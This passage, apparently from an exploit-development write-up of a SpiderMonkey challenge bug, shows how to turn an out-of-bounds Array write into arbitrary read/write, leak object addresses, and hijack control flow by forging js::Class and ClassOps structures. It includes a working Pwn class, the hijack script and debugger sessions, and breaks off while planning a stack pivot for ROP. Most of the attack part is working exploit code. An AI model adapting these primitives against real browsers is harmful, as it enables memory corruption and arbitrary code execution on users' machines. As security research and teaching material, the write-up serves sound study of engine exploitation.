js> b = new Array(1,2,3,4,5,6)
[1, 2, 3, 4, 5, 6]

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> b[9]

js> b.blaze() == undefined
false

js> b[9]
6.951651517974e-310

js> Int64.fromDouble(6.951651517974e-310).toString(16)
"0x00007ff7f7ecdac0"

# break to the debugger

0:006> ln 0x00007ff7f7ecdac0
(00007ff7f7ecdab0)   js!emptyElementsHeader+0x10
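
The index arithmetic generalises to any field of the neighbouring object. Here is a tiny sketch of it; the sizes and offsets come from the debugger output in this article, while the helper name oobIndex is hypothetical.

```javascript
// Sizes and offsets taken from the debugger output in this article.
const ARRAY_OBJECT_SIZE = 0x60;      // OBJECT8_BACKGROUND thing size
const INLINE_ELEMENTS_OFFSET = 0x30; // where the Array's inline buffer starts

// Hypothetical helper: index into the blaze'd Array that lands on
// `offset` bytes into the object allocated right after it.
function oobIndex(offset) {
    if (offset % 8 !== 0) {
        throw new Error('Offset must be 8-byte aligned');
    }
    return (ARRAY_OBJECT_SIZE - INLINE_ELEMENTS_OFFSET + offset) / 8;
}

console.log(oobIndex(0x18)); // 9  -> elements_
console.log(oobIndex(0x28)); // 11 -> LENGTH_SLOT
console.log(oobIndex(0x38)); // 13 -> DATA_SLOT
console.log(oobIndex(0x40)); // 14 -> first 8 bytes of inline data
```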


For the read and write primitives, as mentioned earlier, we can corrupt the DATA_SLOT pointer of the TypedArray with the address we want to read from / write to encoded as a double. Corrupting the length is even easier as it is stored as a js::Value. The base pointer should be at index 13 (9+4) and the length at index 11 (9+2).

js> b.length
420

js> c.length
8

js> b[11]
8

js> b[11] = 1337
1337

js> c.length
1337

js> b[13] = new Int64('0xdeadbeefbaadc0de').asDouble()
-1.1885958399657559e+148


Reading a byte out of c should now trigger the below exception in the debugger:

js!js::TypedArrayObject::getElement+0x4a:
00007ff7f796648a 8a0408          mov     al,byte ptr [rax+rcx] ds:deadbeefbaadc0de=??

0:000> kc
# Call Site
00 js!js::TypedArrayObject::getElement
01 js!js::NativeGetPropertyNoGC
02 js!Interpret
03 js!js::RunScript
04 js!js::ExecuteKernel
05 js!js::Execute
06 js!JS_ExecuteScript
07 js!Process
08 js!main
09 js!__scrt_common_main_seh

0:000> lsa .
1844:     switch (type()) {
1845:       case Scalar::Int8:
1846:         return Int8Array::getIndexValue(this, index);
1847:       case Scalar::Uint8:
> 1848:         return Uint8Array::getIndexValue(this, index);
1849:       case Scalar::Int16:
1850:         return Int16Array::getIndexValue(this, index);
1851:       case Scalar::Uint16:
1852:         return Uint16Array::getIndexValue(this, index);
1853:       case Scalar::Int32:


Pewpew.
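
If you do not have the challenge binaries at hand, the idea can still be played with in a toy model. To be clear, the sketch below is not SpiderMonkey: a flat buffer stands in for process memory, values are stored raw instead of as js::Value / doubles, and every name is made up. Only the object size and the slot offsets are borrowed from the dumps above.

```javascript
// Toy model, NOT SpiderMonkey: a flat buffer stands in for process memory,
// with an "Array" at 0x100 and a "TypedArray" right after it.
const memory = new DataView(new ArrayBuffer(0x1000));
const ARRAY_ADDR = 0x100;
const TYPED_ADDR = ARRAY_ADDR + 0x60;

// TypedArray fields used by the model (offsets from the dump above).
memory.setBigUint64(TYPED_ADDR + 0x28, 8n, true);                        // length
memory.setBigUint64(TYPED_ADDR + 0x38, BigInt(TYPED_ADDR + 0x40), true); // data

// A secret byte living somewhere else in "memory".
const SECRET_ADDR = 0x800;
memory.setUint8(SECRET_ADDR, 0x41);

let arrayLength = 6;
function blaze() {
    arrayLength = 420;
}

// Array element write, with a bounds check that blaze() makes useless.
function arrayWrite(index, value) {
    if (index >= arrayLength) {
        throw new RangeError('out of bounds');
    }
    memory.setBigUint64(ARRAY_ADDR + 0x30 + index * 8, value, true);
}

// TypedArray element read: it trusts its own length and data pointer.
function typedRead(index) {
    const length = memory.getBigUint64(TYPED_ADDR + 0x28, true);
    const data = memory.getBigUint64(TYPED_ADDR + 0x38, true);
    if (BigInt(index) >= length) {
        throw new RangeError('out of bounds');
    }
    return memory.getUint8(Number(data) + index);
}

blaze();
arrayWrite(13, BigInt(SECRET_ADDR));    // corrupt the data pointer
console.log(typedRead(0).toString(16)); // 41
```

Index 13 of the first object overlaps the data pointer of the second one, so a single out-of-bounds write is enough to redirect every subsequent read.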

Building an object address leak primitive

Another primitive that has been incredibly useful is something that allows us to leak the address of an arbitrary JavaScript object. It is useful for both debugging and corrupting objects in memory. Again, this is fairly easy to implement once you have the above primitives. We could place a third Array (adjacent to the TypedArray), write the object we want to leak the address of in the first entry of the Array and use the TypedArray to read relatively from its inline backing buffer to retrieve the js::Value of the object to leak the address of. From there, we could just strip off some bits and call it a day. Same with the property of an adjacent object (which is used in foxpwn written by saelo). It is basically a matter of being able to read relatively from the inline buffer to a location that eventually leads you to the js::Value encoding your object address.

Another solution that does not require us to create another array is to use the first Array to write out-of-bounds into the backing buffer of our TypedArray. Then, we can simply read out of the TypedArray inline backing buffer byte by byte the js::Value and extract the object address. We should be able to write in the TypedArray buffer using the index 14 (9+5). Don't forget to instantiate your TypedArray with enough storage to account for this or you will end up corrupting memory :-).

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> d = new Array(1337, 1338, 1339)
[1337, 1338, 1339]

js> b[14] = d
[1337, 1338, 1339]

js> c.slice(0, 8)
({0:32, 1:29, 2:32, 3:141, 4:108, 5:1, 6:254, 7:255})

js> Int64.fromJSValue(c.slice(0, 8)).toString(16)
"0x0000016c8d201d20"


And we can verify with the debugger that we indeed leaked the address of d:

0:005> !smdump_jsobject 0x16c8d201d20
16c8d201d20: js!js::ArrayObject:   Length: 3
16c8d201d20: js!js::ArrayObject: Capacity: 6
16c8d201d20: js!js::ArrayObject:  Content: [0x539, 0x53a, 0x53b]
@$smdump_jsvalue(0xfffe016c8d201d20)

0:005> ? 539
Evaluate expression: 1337 = 0000000000000539
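
For the curious, the decoding step that turns those eight bytes into an address can be sketched with BigInt. This mirrors the effect of the Int64.fromJSValue call above, not necessarily its implementation; the function name is made up, and the 47-bit payload mask is derived from the tag shift discussed earlier.

```javascript
// Rough BigInt equivalent of what Int64.fromJSValue is used for here:
// rebuild the 64-bit js::Value from little-endian bytes, then keep the low
// 47 bits, which hold the pointer payload. The function name is illustrative.
function addressFromJSValueBytes(bytes) {
    if (bytes.length !== 8) {
        throw new Error('Needs to be an 8 bytes long array');
    }
    let bits = 0n;
    for (let i = 7; i >= 0; i--) {
        bits = (bits << 8n) | BigInt(bytes[i]);
    }
    const PAYLOAD_MASK = (1n << 47n) - 1n;
    return bits & PAYLOAD_MASK;
}

// Bytes read out of the TypedArray in the session above.
const leakedBytes = [32, 29, 32, 141, 108, 1, 254, 255];
console.log('0x' + addressFromJSValueBytes(leakedBytes).toString(16));
// 0x16c8d201d20
```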


Sweet, we now have all the building blocks we require to write basic.js and pop some calc. At this point, I combined all the primitives we described in a Pwn class that abstracts away the corruption details:

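class __Pwn {
    constructor() {
        this.SavedBase = Smalls[13];
    }

    __Access(Addr, LengthOrValues) {
        if(typeof Addr == 'string') {
            Addr = new Int64(Addr);
        }

        const IsRead = typeof LengthOrValues == 'number';
        let Length = LengthOrValues;
        if(!IsRead) {
            Length = LengthOrValues.length;
        }

        if(IsRead) {
            dbg('Read(' + Addr.toString(16) + ', ' + Length + ')');
        } else {
            dbg('Write(' + Addr.toString(16) + ', ' + Length + ')');
        }

        //
        // Fix U8A's byteLength.
        //

        Smalls[11] = Length;

        //
        // Verify that we properly corrupted the length of U8A.
        //

        if(U8A.byteLength != Length) {
            throw "Error: The Uint8Array's length doesn't check out";
        }

        //
        // Fix U8A's base address.
        //

        Smalls[13] = Addr.asDouble();

        if(IsRead) {
            return U8A.slice(0, Length);
        }

        U8A.set(LengthOrValues);
    }

    Read(Addr, Length) {
        return this.__Access(Addr, Length);
    }

    WritePtr(Addr, Value) {
        const Values = new Int64(Value);
        this.__Access(Addr, Values.bytes());
    }

    ReadPtr(Addr) {
        return new Int64(this.Read(Addr, 8));
    }

    AddrOf(Obj) {

        //
        // Fix U8A's byteLength and base.
        //

        Smalls[11] = 8;
        Smalls[13] = this.SavedBase;

        //
        // Smalls is contiguous with U8A. Go and write a jsvalue in its buffer,
        // and then read it out via U8A.
        //

        Smalls[14] = Obj;
        return Int64.fromJSValue(U8A.slice(0, 8));
    }
};

const Pwn = new __Pwn();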


Hijacking control-flow

Now that we have built ourselves all the necessary tools, we need to find a way to hijack control-flow. In Firefox, this is not something that is protected against by any type of CFI implementations so it is just a matter of finding a writeable function pointer and a way to trigger its invocation from JavaScript. We will deal with the rest later :).

Based off what I have read over time, there have been several ways to achieve that depending on the context and your constraints:

1. Overwriting a saved-return address (what people usually choose to do when software is protected with forward-edge CFI),
2. Overwriting a virtual-table entry (plenty of those in a browser context),
3. Overwriting a pointer to a JIT'd JavaScript function (good target in a JavaScript shell as the above does not really exist),
4. Overwriting another type of function pointer (another good target in a JavaScript shell environment).

The last item is the one we will be focusing on today. Finding such a target was not really hard as one was already described by Hanming Zhang from 360 Vulcan team.

Every JavaScript object defines various methods and as a result, those must be stored somewhere. Lucky for us, there are a bunch of SpiderMonkey structures that describe just that. One of the fields we did not mention earlier in a js::NativeObject is the group_ field. A js::ObjectGroup documents type information of a group of objects. The clasp_ field links to another object that describes the class of the object group.

For example, the class for our c object is Uint8Array. It is precisely in this object that the name of the class and the various methods it defines can be found. If we follow the cOps field of the js::Class object we end up on a bunch of function pointers that get invoked by the JavaScript engine at special times: adding a property to an object, removing a property, etc.

Enough talking, let's have a look in the debugger what it actually looks like with a TypedArray object:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7f7aee140 56              push    rsi

0:000> ?? vp[2]
union JS::Value
+0x000 asBits_          : 0xfffe016c8d201cc0
+0x000 asDouble_        : -1.#QNAN
+0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 0x016c8d201cc0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x0000016c8daac970 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff7f7ecdac0 js::HeapSlot

0:000> dt js!js::GCPtr<js::ObjectGroup *> 0x16c8d201cc0
+0x000 value            : 0x0000016c8da7ad30 js::ObjectGroup

0:000> dt js!js::ObjectGroup 0x0000016c8da7ad30
+0x000 clasp_           : 0x00007ff7f7edc510 js::Class
+0x008 proto_           : js::GCPtr<js::TaggedProto>
+0x010 realm_           : 0x0000016c8d92a800 JS::Realm
+0x018 flags_           : 1
+0x028 propertySet      : (null)

0:000> dt js!js::Class 0x00007ff7f7edc510
+0x000 name             : 0x00007ff7f7f8e0e8  "Uint8Array"
+0x008 flags            : 0x65200303
+0x010 cOps             : 0x00007ff7f7edc690 js::ClassOps
+0x018 spec             : 0x00007ff7f7edc730 js::ClassSpec
+0x020 ext              : 0x00007ff7f7edc930 js::ClassExtension
+0x028 oOps             : (null)

0:000> dt js!js::ClassOps 0x00007ff7f7edc690
+0x000 addProperty      : (null)
+0x008 delProperty      : (null)
+0x010 enumerate        : (null)
+0x018 newEnumerate     : (null)
+0x020 resolve          : (null)
+0x028 mayResolve       : (null)
+0x030 finalize         : 0x00007ff7f7961000     void  js!js::TypedArrayObject::finalize+0
+0x038 call             : (null)
+0x040 hasInstance      : (null)
+0x048 construct        : (null)
+0x050 trace            : 0x00007ff7f780a330     void  js!js::ArrayBufferViewObject::trace+0

0:000> !address 0x00007ff7f7edc690
Usage:                  Image
End Address:            00007ff7f7fd4000
Region Size:            000000000013a000 (   1.227 MB)
State:                  00001000          MEM_COMMIT
Type:                   01000000          MEM_IMAGE


Naturally those pointers are stored in a read-only section, which means we cannot overwrite them directly. But it is fine, we can keep stepping backward until we find a writeable pointer. Once we do, we can artificially recreate the chain of structures ourselves up to the cOps field, but with hijacked pointers. Based on the above, the "earliest" object we can corrupt is the js::ObjectGroup one and more precisely its clasp_ field.
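
The chain we just followed by hand in the debugger boils down to three pointer reads. Here is a sketch of it where readPtr stands in for any read primitive returning a 64-bit BigInt; the function name and the mock memory are hypothetical, while the offsets and addresses are the ones from the dt output above.

```javascript
// Offsets read off the `dt` output above.
const OFFSET_GROUP = 0x0n; // js::NativeObject::group_
const OFFSET_CLASP = 0x0n; // js::ObjectGroup::clasp_
const OFFSET_COPS = 0x10n; // js::Class::cOps

// `readPtr` is any function returning the 64-bit value stored at an
// address (as a BigInt); here it is a stand-in for a real read primitive.
function walkToClassOps(readPtr, objectAddress) {
    const group = readPtr(objectAddress + OFFSET_GROUP);
    const clasp = readPtr(group + OFFSET_CLASP);
    const cOps = readPtr(clasp + OFFSET_COPS);
    return { group, clasp, cOps };
}

// Mock memory populated with the values from the debugger session.
const mockMemory = new Map([
    [0x16c8d201cc0n, 0x16c8da7ad30n],   // object      -> group_
    [0x16c8da7ad30n, 0x7ff7f7edc510n],  // group_      -> clasp_
    [0x7ff7f7edc520n, 0x7ff7f7edc690n], // clasp_+0x10 -> cOps
]);
const chain = walkToClassOps((addr) => mockMemory.get(addr), 0x16c8d201cc0n);
console.log(chain.cOps.toString(16)); // 7ff7f7edc690
```

Only the first hop (the group_ and its clasp_ field) lives in writeable memory; the js::Class and js::ClassOps objects sit in the image, which is why they have to be copied elsewhere before being tampered with.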

Cool. Before moving forward, we should verify that controlling the cOps function pointers actually lets us hijack control flow from JavaScript.

Well, let's overwrite the cOps.addProperty field directly from the debugger:

0:000> eq 0x00007ff7f7edc690 deadbeefbaadc0de

0:000> g


And add a property to the object:

js> c.diary_of_a_reverse_engineer = 1337

0:000> g
(3af0.3b40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff780e400cc 48ffe0          jmp     rax {deadbeefbaadc0de}

0:000> kc
# Call Site
03 js!DefineNonexistentProperty
04 js!SetNonexistentProperty<1>
05 js!js::NativeSetProperty<1>
06 js!js::SetProperty
07 js!SetPropertyOperation
08 js!Interpret
09 js!js::RunScript
0a js!js::ExecuteKernel
0b js!js::Execute
0c js!ExecuteScript
0d js!JS_ExecuteScript
0e js!RunFile
0f js!Process
10 js!ProcessArgs
11 js!Shell
12 js!main
13 js!invoke_main
14 js!__scrt_common_main_seh


Thanks to the Pwn class we wrote earlier this should be pretty easy to pull off. We can use Pwn.AddrOf to leak an object address (called Target below), follow the chain of pointers and recreate those structures by just copying their content into the backing buffer of a TypedArray for example (called MemoryBackingObject below). Once this is done, we simply overwrite the addProperty field of our target object.

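//
// Retrieve a bunch of addresses needed to replace Target's clasp_ field.
//

const Target = new Uint8Array(90);
const TargetAddress = Pwn.AddrOf(Target);
const TargetGroup_ = Pwn.ReadPtr(TargetAddress);
const TargetClasp_ = Pwn.ReadPtr(TargetGroup_);
const TargetcOps = Pwn.ReadPtr(Add(TargetClasp_, 0x10));
const TargetClasp_Address = Add(TargetGroup_, 0x0);

const TargetShapeOrExpando_ = Pwn.ReadPtr(Add(TargetAddress, 0x8));
const TargetBase_ = Pwn.ReadPtr(TargetShapeOrExpando_);
const TargetBaseClasp_Address = Add(TargetBase_, 0);

const MemoryBackingObject = new Uint8Array(0x88);
const MemoryBackingObjectAddress = Pwn.AddrOf(MemoryBackingObject);
const ClassMemoryBackingAddress = Pwn.ReadPtr(Add(MemoryBackingObjectAddress, 7 * 8));
// 0:000> ?? sizeof(js!js::Class)
// unsigned int64 0x30
const ClassOpsMemoryBackingAddress = Add(ClassMemoryBackingAddress, 0x30);
print('[+] js::Class / js::ClassOps backing memory is @ ' + MemoryBackingObjectAddress.toString(16));

//
// Copy the original Class object into our backing memory, and hijack
// the cOps field.
//

MemoryBackingObject.set(Pwn.Read(TargetClasp_, 0x30), 0);
MemoryBackingObject.set(ClassOpsMemoryBackingAddress.bytes(), 0x10);

//
// Copy the original ClassOps object into our backing memory and hijack
// the addProperty field.
//

MemoryBackingObject.set(Pwn.Read(TargetcOps, 0x58), 0x30);
MemoryBackingObject.set(new Int64('0xdeadbeefbaadc0de').bytes(), 0x30);

print("[*] Overwriting Target's clasp_ @ " + TargetClasp_Address.toString(16));
Pwn.WritePtr(TargetClasp_Address, ClassMemoryBackingAddress);
print("[*] Overwriting Target's shape clasp_ @ " + TargetBaseClasp_Address.toString(16));
Pwn.WritePtr(TargetBaseClasp_Address, ClassMemoryBackingAddress);

//
// Let's pull the trigger now.
//

print('[*] Pulling the trigger bebe..');
Target.im_falling_and_i_cant_turn_back = 1;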
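
The layout of the 0x88-byte backing buffer is easier to reason about as a pure function. The sketch below is standalone (BigInt and DataView only, no Int64.js), and the helper names are hypothetical. The sizes are inferred from the debugger output: js::Class is 0x30 bytes, and js::ClassOps spans 0x58 bytes since its last field, trace, sits at +0x50.

```javascript
// Sizes inferred from the debugger output: js::Class is 0x30 bytes, and
// js::ClassOps spans 0x58 bytes (last field, trace, sits at +0x50).
const CLASS_SIZE = 0x30;
const CLASS_OPS_SIZE = 0x58;
const COPS_OFFSET = 0x10;        // js::Class::cOps
const ADD_PROPERTY_OFFSET = 0x0; // js::ClassOps::addProperty

function u64Bytes(value) {
    const out = new Uint8Array(8);
    new DataView(out.buffer).setBigUint64(0, value, true);
    return out;
}

// Hypothetical helper: returns the bytes of a fake Class immediately
// followed by a fake ClassOps, given the address where they will live.
function buildFakeClass(classBytes, classOpsBytes, backingAddress, hijackTarget) {
    const fake = new Uint8Array(CLASS_SIZE + CLASS_OPS_SIZE);
    fake.set(classBytes.subarray(0, CLASS_SIZE), 0);
    fake.set(classOpsBytes.subarray(0, CLASS_OPS_SIZE), CLASS_SIZE);
    // Point cOps at our copy of ClassOps, then hijack addProperty.
    fake.set(u64Bytes(backingAddress + BigInt(CLASS_SIZE)), COPS_OFFSET);
    fake.set(u64Bytes(hijackTarget), CLASS_SIZE + ADD_PROPERTY_OFFSET);
    return fake;
}

// Example with zeroed originals and a made-up backing address.
const fake = buildFakeClass(
    new Uint8Array(CLASS_SIZE), new Uint8Array(CLASS_OPS_SIZE),
    0x1000n, 0xdeadbeefbaadc0den);
console.log(fake.length.toString(16)); // 88
```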


Note that we also overwrite another field in the shape object as the debug version of the JavaScript shell has an assert that ensures that the object class retrieved from the shape is identical to the one in the object group. If you don't, here is the crash you will encounter:

Assertion failure: shape->getObjectClass() == getClass(), at c:\Users\over\mozilla-central\js\src\vm/NativeObject-inl.h:659


Pivoting the stack

As always with modern exploitation, hijacking control-flow is only the beginning of the journey. We want to execute arbitrary native code in the JavaScript shell. To exploit this traditionally with ROP we have three of the four ingredients:

• We know where things are in memory,
• We have a way to control the execution,
• We have arbitrary space to store the chain and aren't constrained in any way,
• But we do not have a way to pivot the stack to a region of memory we have under our control.

Now if we want to pivot the stack to a location under our control, we need to have some sort of control of the CPU context when we hijack the control-flow. To understand a bit more which cards we are playing with, we need to investigate how this function pointer is invoked and see if we can control any arguments, etc.

/** Add a property named by id to obj. */
typedef bool (*JSAddPropertyOp)(JSContext* cx, JS::HandleObject obj,
JS::HandleId id, JS::HandleValue v);


And here is the CPU context at the hijack point:

0:000> r
rax=000000000001fff1 rbx=000000469b9ff490 rcx=0000020a7d928800
rip=00007ff658b7b3a2 rsp=000000469b9fefd0 rbp=0000000000000000
r8=000000469b9ff248  r9=0000020a7deb8098 r10=0000000000000000
r11=0000000000000000 r12=0000020a7da02e10 r13=000000469b9ff490
r14=0000000000000001 r15=0000020a7dbbc0b0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
js!js::NativeSetProperty<js::Qualified>+0x2b52:
00007ff658b7b3a2 ffd7            call    rdi {deadbeefbaadc0de}


Let's break down the CPU context:

1. @rdx is obj which is a pointer to the JSObject (Target in the script above. Also note that @rbx has the same value),
2. @r8 is id` which